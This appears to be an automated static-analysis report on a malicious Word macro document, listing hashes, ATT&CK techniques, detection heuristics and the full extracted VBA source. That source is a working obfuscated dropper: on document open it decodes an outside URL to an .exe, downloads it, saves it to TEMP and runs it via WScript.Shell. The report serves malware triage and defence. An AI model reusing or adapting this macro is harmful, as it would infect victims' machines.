Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 715de60ab1a1f5b3…

MALICIOUS

Office (OLE)

72.0 KB Created: 2016-05-09 21:35:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 48ba36e3cfbe839dc7cb9c492599b519 SHA-1: a628bed08aa650a8eaa4a60cc917f40fae85c895 SHA-256: 715de60ab1a1f5b3e25c62e3e2ec07d508b57f6f504828b39a8456013a62841e
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes Shell() and CreateObject() calls, indicative of malicious intent. The script appears to be obfuscated but attempts to construct a URL, likely for downloading a secondary payload. The ClamAV detection 'Doc.Dropper.Donoff-5743530-0' further supports its classification as a dropper.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim ZwEmILWhS As Integer
    Set aXMDDhm = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xAOSj As Boolean
    Set EiqHnrvc = CreateObject("ADODB.Stream")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim pzxEpuX As Integer, kTRGfWEy As Integer
    YAubrn = CallByName(HMfiOddZ, OJrOKDZc, 2)
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim LNbVOO As Boolean
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7611 bytes
SHA-256: 49008e87149a9e1d392b9fd6b770f5b81dc84a1a56dee80195755df16fec6721
Detection
ClamAV: No threats found
Obfuscation or payload: likely
136 of 214 identifiers look randomly generated (e.g. 'RxKeNsKpNonKsCeCBKoNxdKy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim LNbVOO As Boolean
wLteImnF.UFXClS
End Sub
Private Sub MtzgDJZnqP()
RdzCgNLfo "wksVqftGBnLcm", "ECYtgFRZk", False
cdVmY 1519, False, True
End Sub

Attribute VB_Name = "zIMPiyXg"
Private Sub xZCwW(ByVal DoFeaT As String)
cUAGYTZsVc 1225, 2737, "gB9Agn2nS7kDt"
eeccmroa 8244
sIezp
qjETUiCBEo 1195, "7BptBYpVo", "PZT7JNbEGsOnpEv"
End Sub
Public Function uBRMvnuTkN(ByVal DvhBjri As Integer, ByVal rvjkB As String) As String
Dim tlgQiOKqTw As Boolean
uBRMvnuTkN = Mid(rvjkB, DvhBjri, 1)
End Function
Private Sub tAKjkVF(ByVal xXfArtk As String)
yqdpRWtCu
End Sub
Public Function nKKEu(ByVal YYoCUm As String, ByVal flTnd As String, ByVal QGrTXCEOfF As String) As Boolean
Dim mCnUIsoY As String
Dim gZPGFMzJ As String
nKKEu = InStr(1, QGrTXCEOfF, YYoCUm)
End Function

Attribute VB_Name = "qXbpDy"
Public Function AnzIxa(ByVal NkpNAE As String, ByVal fJrdyBG As String) As String
Dim JXAuApxNu As Boolean
Dim TocFs As String, IBGFmd As String
For zKzwrgK = 1 To Len(NkpNAE)
JXAuApxNu = zIMPiyXg.nKKEu(zIMPiyXg.uBRMvnuTkN(zKzwrgK, NkpNAE), AdvIqUmZik, fJrdyBG)
If Not JXAuApxNu Then
XQUKUIlGS = 9746
AnzIxa = AnzIxa & zIMPiyXg.uBRMvnuTkN(zKzwrgK, NkpNAE)
End If
Next
End Function
Private Function AdvIqUmZik() As String
IkmTucyV = "TqaEAGTHtleDree"
AdvIqUmZik = "tSJzLZ6VGuj2eOD"
End Function

Attribute VB_Name = "wLteImnF"
Private Function UcWhJ() As String
qAgGuRAod = 7052
UcWhJ = qXbpDy.AnzIxa("hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1")
End Function
Private Sub KIJUR(ByVal AOlwZ As String)
Dim YZaPHJ As Integer
MDpGo = "V9TG4hgAVQoVzsV"
FbWhNy.gRxaIPh True, dVtdbgyQT, NRwvTXQpYs.aXMDDhm, AOlwZ
End Sub
Public Sub UFXClS()
cKAIKaerq = "9CLINLk4BxnR"
zxzkd
End Sub
Private Function vwEoG() As String
vwEoG = "nDvXoVSzB8A6"
End Function
Private Function uJtgJVwOTT() As String
Dim cWkVAU As Integer
uJtgJVwOTT = XJrrHj(qXbpDy.AnzIxa("eTJEoMPe", "eJo")) & zSpEL
End Function
Private Function vxTJFVol() As String
vxTJFVol = qXbpDy.AnzIxa("RxKeNsKpNonKsCeCBKoNxdKy", "NKCx")
End Function
Private Function HYJZIkzk() As String
HYJZIkzk = "GlXmHZ5kRukj"
End Function
Private Sub LspanJIhmp(ByVal saMSPPQRJ As Integer, ByVal rADoUYuuiY As String, ByVal FjvMSIN As String, ByVal QTeBMx As String)
Dim llkVogM As String, ZyPTWCYq As Integer
Set zZZjUJ = NRwvTXQpYs.iGrBgBOZf
zZZjUJ.Open OIIyDN, FjvMSIN, False
FbWhNy.RcVRcMWn zZZjUJ, qXbpDy.AnzIxa("PSeYbndb", "bPY")
QtwMqNWbV False, rADoUYuuiY, "J0H9oKYSPA5lCiM", FbWhNy.YAubrn(zZZjUJ, "ITENZNmX21w", vxTJFVol, 1945)
End Sub
Private Function IuXyvD() As String
IuXyvD = qXbpDy.AnzIxa("CRlAoRsAAe", "ERNA")
End Function
Private Function wjxATzPD() As String
Dim QMviypQfKS As Integer
wjxATzPD = UcWhJ
End Function
Private Sub FbSjPK()
JPvLzyRGsx 7449
NURQhgJR
bFqvCc False, True, 9563
qjMaTOIxQi
End Sub
Private Function zSpEL() As String
Dim RIvSZF As String
Dim IcMvp As Integer
zSpEL = tnqdpEMypZ
End Function
Private Sub zxzkd()
On Error GoTo yWAXXThe
LspanJIhmp 5708, uJtgJVwOTT, wjxATzPD, HYJZIkzk
ieHcrIl = "AftaitYyCx"
KIJUR uJtgJVwOTT
Exit Sub
QIGVmfY = "7g5eHEMzF907jC"
yWAXXThe:
End Sub
Private Function tnqdpEMypZ() As String
IFLCzb = True
tnqdpEMypZ = qXbpDy.AnzIxa("j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr")
End Function
Private Function dvvnf(ByVal xEiJI As Integer, ByVal dlksibEHV As Boolean) As String
ICxOAIJEjl
JDQNlwwUu
ubsRjN True
dvvnf = "1D7MzvYfVRv"
End Function
Private Function sdlTSU(ByVal eCPkMeytIw As Boolean) As Boolean
If NACpLN("a5pjwAOdf", "GjjI5Q91FNK9W") Then
GbhxArF
Halxgk
End If
nDkOinXoNp
SclaOvXM 3912, False, "bv9Vhwjsqp"
SFyHb
sdlTSU = False
End Function
Private Sub EhHmFQ()
aBDhFcyR "vReBrHvcVN", "Ro11IIqiqKX"
End Sub
Private Function OIIyDN() As String
bwVhN = 9168
OIIyDN = qXbpDy.AnzIxa("GHZEjT", "4jZc0H")
End Function
Private Function XSNGAIDfO() As String
XSNGAIDfO = qXbpDy.AnzIxa("wOpWeinw", "wiW")
End Function
Private Function dVtdbgyQT() As String
mVMPpQPeMQ = 3401
dVtdbgyQT = qXbpDy.AnzIxa("jE0xe0jc", "jWh60f")
End Function
Private Sub QtwMqNWbV(ByVal hcBeTJhx As Boolean, ByVal YkGoK As String, ByVal zhAXaq As String, ByVal qhmEeHArgX As Variant)
Dim fWNWnp As String
Set ewmiuE = NRwvTXQpYs.EiqHnrvc
bZfJcN = 978
FbWhNy.bDGDCdkij 654, xbEwL, 1, vwEoG, ewmiuE
FbWhNy.RcVRcMWn ewmiuE, XSNGAIDfO
FbWhNy.gRxaIPh True, qXbpDy.AnzIxa("Wbr3i0OtOe", "b3O0"), ewmiuE, qhmEeHArgX
FbWhNy.BDjTw qXbpDy.AnzIxa("hSaGhverTGhoFGrilGeG", "rhG"), 2, YkGoK, ewmiuE
FbWhNy.RcVRcMWn ewmiuE, IuXyvD
End Sub
Private Function XJrrHj(ByVal umDhOe As String) As String
Set BzLNizsb = FbWhNy.RstBxzgMSw(qXbpDy.AnzIxa("rPrROFCr0ErSFS", "r0F"), qXbpDy.AnzIxa("EWwn vi  ro00n0mwenWtw", "Ww0 "), NRwvTXQpYs.aXMDDhm)
ZcTzOUAO = False
XJrrHj = BzLNizsb(umDhOe)
End Function
Private Function xbEwL() As String
xbEwL = qXbpDy.AnzIxa("TPyPlpe1", "1lmPs")
End Function

Attribute VB_Name = "NRwvTXQpYs"
Public Function EiqHnrvc() As Object
Dim xAOSj As Boolean
Set EiqHnrvc = CreateObject("ADODB.Stream")
End Function
Public Function aXMDDhm() As Object
Dim ZwEmILWhS As Integer
Set aXMDDhm = CreateObject("WScript.Shell")
End Function
Public Function iGrBgBOZf() As Object
Dim qWOWKYxLr As String
Set iGrBgBOZf = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Function YAVZkRkG() As Integer
YRcIVIcog
zzTmoaeZe False, "jOuA52b79wv1Qeu"
ngYFxDZeTQ False, 7239, "M22wvI0EctXv5UL"
YAVZkRkG = 7668
End Function

Attribute VB_Name = "FbWhNy"
Public Function YAubrn(ByVal HMfiOddZ As Object, ByVal oTxeZRKXp As String, ByVal OJrOKDZc As String, ByVal wVRBwgDA As Integer) As Variant
Dim pzxEpuX As Integer, kTRGfWEy As Integer
YAubrn = CallByName(HMfiOddZ, OJrOKDZc, 2)
End Function
Public Sub BDjTw(ByVal yYtGYcTBb As String, ByVal yncGXi As Variant, ByVal qAbQMoYZ As Variant, ByVal Spygfkxg As Object)
Dim KmqlTIt As String
CallByName Spygfkxg, yYtGYcTBb, 1, qAbQMoYZ, yncGXi
End Sub
Private Function aGvZEFE() As Boolean
HTXti "Uh7TheWrJT4"
aGvZEFE = False
End Function
Public Function RstBxzgMSw(ByVal HBehUHLc As String, ByVal rSeJlS As String, ByVal wEzxI As Object) As Variant
Dim nXjAA As Boolean
Dim dQXBIPln As Boolean
Set RstBxzgMSw = CallByName(wEzxI, rSeJlS, 2, HBehUHLc)
End Function
Public Sub gRxaIPh(ByVal eadwm As Boolean, ByVal XYIJsDfMSz As String, ByVal gGjZkuA As Object, ByVal sXwdAhxT As Variant)
Dim ITSHjxH As Integer
Dim FHVydPO As Integer
CallByName gGjZkuA, XYIJsDfMSz, 1, sXwdAhxT
End Sub
Private Sub ZFhCa(ByVal vniSMd As Boolean)
NvOKlpusE
aVtapbVnl "yN8cLaNIQMFflAS", 1093, 9096
End Sub
Private Function PlfDY() As Integer
nCnktKv False
hCCQENhD 3748, 2598, "m5Ntfcw5r1gw"
CGgZkEaFBc
PlfDY = 1258
End Function
Public Sub bDGDCdkij(ByVal dFpQXE As Integer, ByVal DbTaqKSka As String, ByVal rMZNRmRIvs As Variant, ByVal rjoKdlKSQP As String, ByVal lPQrwnFcv As Object)
CallByName lPQrwnFcv, DbTaqKSka, 4, rMZNRmRIvs
End Sub
Private Function JjkpMEUt(ByVal YQktM As String) As Boolean
gOZso 1884
JjkpMEUt = True
End Function
Public Sub RcVRcMWn(ByVal SdUaHfol As Object, ByVal sibSUZfw As String)
Dim txZZb As Integer
Dim StzetEcGHa As Integer
kayWGvM = "EbCk4Rx7eMKERnZ"
CallByName SdUaHfol, sibSUZfw, 1
End Sub